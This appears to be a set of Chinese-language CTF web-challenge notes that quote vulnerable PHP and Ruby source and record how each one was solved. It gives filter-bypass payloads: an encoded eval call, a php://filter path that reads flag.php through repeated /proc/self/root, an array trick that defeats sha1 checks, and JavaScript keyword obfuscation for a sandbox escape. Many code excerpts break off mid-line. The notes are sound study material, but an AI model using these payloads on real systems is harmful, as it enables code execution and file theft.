[ISITDTU 2019]EasyPHP
<?phphighlight_file(__FILE__);$_ = @$_GET['_'];if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) die('rosé will not do it');if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd ) die('you are so close, omg');eval($_);?>
payload:
(~%8F%97%8F%96%91%99%90)();
[极客大挑战 2020]Greatphp
反序列化
<?phperror_reporting(0);class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){ if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){ eval($this->syc); } else { die("Try Hard !!&quo ...
EasyBypass
<?phphighlight_file(__FILE__);$comm1 = $_GET['comm1'];$comm2 = $_GET['comm2'];if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1)) $comm1 = "";if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2)) ...
[SCTF2019]Flag Shop
新东西
ruby注入
还以为是js
本来想爆破jwt的,结果有robots.txt,里面提示得到了源码。
require 'sinatra'require 'sinatra/cookies'require 'sinatra/json'require 'jwt'require 'securerandom'require 'erb'set :public_folder, File.dirname(__FILE__) + '/static'FLAGPRICE = 1000000000000000000000000000ENV["SECRET"] = SecureRandom.hex(64)configure do enable :logging file = File.new(File.dirname(__FILE__) + '/../log/http.log',"a+") file.sy ...
[WMCTF2020]Make PHP Great Again
require_once绕过,直接找网上的payload
php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
原理
https://www.anquanke.com/post/id/213235
[极客大挑战 2020]Roamphp1-Welcome
一顿操作没发现什么,抓包,发现不允许get,改一下post就有源码了。
sha1强等于绕过。用数组绕过即可
roam1[]=1&roam2[]=2
[MRCTF2020]Ezaudit
打开得到一个类似官网之类的网站
一顿操作无果后,扫一下,发现有www.zip
而里面有index.php,源码得到了,
<?php header('Content-type:text/html; charset=utf-8');error_reporting(0);if(isset($_POST['login'])){ $username = $_POST['username']; $password = $_POST['password']; $Private_key = $_POST['Private_key']; if (($username == '') || ($password == '') ||($Private_key == '')) { // 若为空,视为未填写,提示错误,并3秒后返回登录界面 header('refresh ...
[GXYCTF2019]StrongestMind
python 脚本编写
边敲边改import timefrom requests import *import reurl="http://5ee91e70-c1b8-4921-84fb-34dda71ee977.node4.buuoj.cn:81/"s=session()res = s.get(url=url)res.encoding = "UTF-8"for i in range(1001): print(res.text) match=re.findall("<br>(.*)<br>",res.text) # print(match) # print(match[0]) rem=re.findall("<br>[0-9].*<br>",match[0]) text=rem[0].replace("<br>","")# print(rem[0].replace(&quo ...
[HFCTF2020]JustEscape
不会js,留个坑
访问run.php
<?phpif( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) { $code = $_GET['code']; echo eval(code);} else { highlight_file(__FILE__);}?>
nodejs
大概就是利用现成的poc,然后由于有关键字,所以利用js的特性进行关键字绕过
prototype变成`${`${`prototyp`}e`}`${`${`prototyp`}e`}`p`,`r`,`o`,`t`,`o`,`t`,`y`,`p`,`e`
https://z3ratu1.github.io/%5BHFCTF2020%5DJustEscape.html
https://blog.csdn.net/qq ...
[BJDCTF]2020EzPHP
F12
base32解码
1nD3x.php
源码<?phphighlight_file(__FILE__);error_reporting(0); $file = "1nD3x.php";$shana = $_GET['shana'];$passwd = $_GET['passwd'];$arg = '';$code = '';echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";if($_SERVER) { if ( preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec ...